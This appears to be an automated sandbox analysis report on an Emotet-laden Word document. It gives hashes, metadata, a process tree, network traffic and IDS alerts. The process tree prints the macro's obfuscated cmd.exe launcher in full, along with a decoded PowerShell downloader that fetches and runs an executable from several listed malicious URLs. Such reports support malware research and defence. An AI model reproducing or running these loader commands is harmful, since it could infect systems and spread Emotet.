File name: | eForm-3296228.doc |
Full analysis: | https://app.any.run/tasks/e9abdf5a-a04b-4839-9eb3-66598287484c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 18:51:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 15:02:00 2018, Last Saved Time/Date: Fri Dec 14 15:02:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 23, Security: 0 |
MD5: | 22237B0E98A7B1F1859846440A4AC104 |
SHA1: | 8B6FB2795EBA2769C21D1EEA77FC3DC923275F48 |
SHA256: | 07A0B1C66FABE2BE19366D6562C70E3A0513C31AE8C878D4D630B3847318F814 |
SSDEEP: | 1536:Locn1kp59gxBK85fBeKaKsLjmv0+K5XyZN7Q2FKH+a9:E41k/W48cKsLjmvx1NEk |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 15:02:00 |
ModifyDate: | 2018:12:14 15:02:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 25 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3516 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\eForm-3296228.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3940 | c:\HaJKihRtkdI\pCXQqijRV\palFkcEZwNzvVU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2464 | CmD /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2624 | C:\Windows\system32\cmd.exe /S /D /c" echo $KSY='QwR';$aLC=new-object Net.WebClient;$cwQ='http://evihdaf.com/syXxoBHdX@http://pingwersen.com/iZTVle9fY@http://ibgd.org/v3uTuE3@http://tevetogluyemek.com.tr/svnkBH2N@http://inwa.net/rUGhAv6jC'.Split('@');$HIT='iSC';$hPl = '749';$IbN='iUO';$sba=$env:temp+'\'+$hPl+'.exe';foreach($jkO in $cwQ){try{$aLC.DownloadFile($jkO, $sba);$CWs='Gzp';If ((Get-Item $sba).length -ge 80000) {Invoke-Item $sba;$BuH='cjf';break;}}catch{}}$CVY='GjZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2696 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^|findstr Cons') DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3084 | C:\Windows\system32\cmd.exe /c ftype|findstr Cons | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3348 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3432 | findstr Cons | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1952 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3060 | "C:\Users\admin\AppData\Local\Temp\749.exe" | C:\Users\admin\AppData\Local\Temp\749.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA4CF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\649517C.wmf | — | |
MD5:— | SHA256:— | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76E8C0EA.wmf | — | |
MD5:— | SHA256:— | |||
1952 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MX78M1AD3YBB0ZXVAVNG.temp | — | |
MD5:— | SHA256:— | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\eForm-3296228.doc.LNK | lnk | |
MD5:B7E2BB7020433E47404EEDF108694AC3 | SHA256:C94C64DD2F4FD7051783EABB57D7250A38984420E57A1289A1A686DB02361177 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\600DFBA7.wmf | wmf | |
MD5:31ED22CAFB1ED5B9C922BDD3100C4E75 | SHA256:083314353C29E0216B08EA931F26633C6C2B7DE4E81976281053E80FA75D0BB2 | |||
3516 | WINWORD.EXE | C:\Users\admin\Downloads\~$orm-3296228.doc | pgc | |
MD5:AD5ED39EF6819771966B8454FC5E0E23 | SHA256:11369E3A884256A8151E0AC75EB0A370448E8560392B554C852B67660F747592 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C9005899C42F58E9E7C96DCB3A5EE8E3 | SHA256:BAAA4B86601B2CDBDAF8C9D3F3076A6A57EBB0E5FFD49CF53E039A90105750E4 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:8732908DA98065B118519D939A5A2D24 | SHA256:4B38EC23F70336F256063D551A3207CCB2DC95F48AA2DC5BAD906907B937B479 | |||
1952 | powershell.exe | C:\Users\admin\AppData\Local\Temp\749.exe | executable | |
MD5:27F7FDA215F8DE9528A480C61773A454 | SHA256:A30ED24D117AB71B256DBE9CB8EE56491E13282F050A3F8B44810DA9DCED9981 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2244 | archivesymbol.exe | GET | — | 190.146.201.54:80 | http://190.146.201.54/ | CO | — | — | malicious |
2396 | archivesymbol.exe | GET | 200 | 190.146.201.54:80 | http://190.146.201.54/ | CO | binary | 104 Kb | malicious |
1952 | powershell.exe | GET | 301 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX | US | html | 237 b | malicious |
1952 | powershell.exe | GET | 200 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX/ | US | executable | 156 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1952 | powershell.exe | 162.220.162.40:80 | evihdaf.com | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC | US | malicious |
2396 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
2244 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
Domain | IP | Reputation |
---|---|---|
evihdaf.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1952 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
1952 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
1952 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1952 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1952 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2396 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2396 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2244 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2244 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |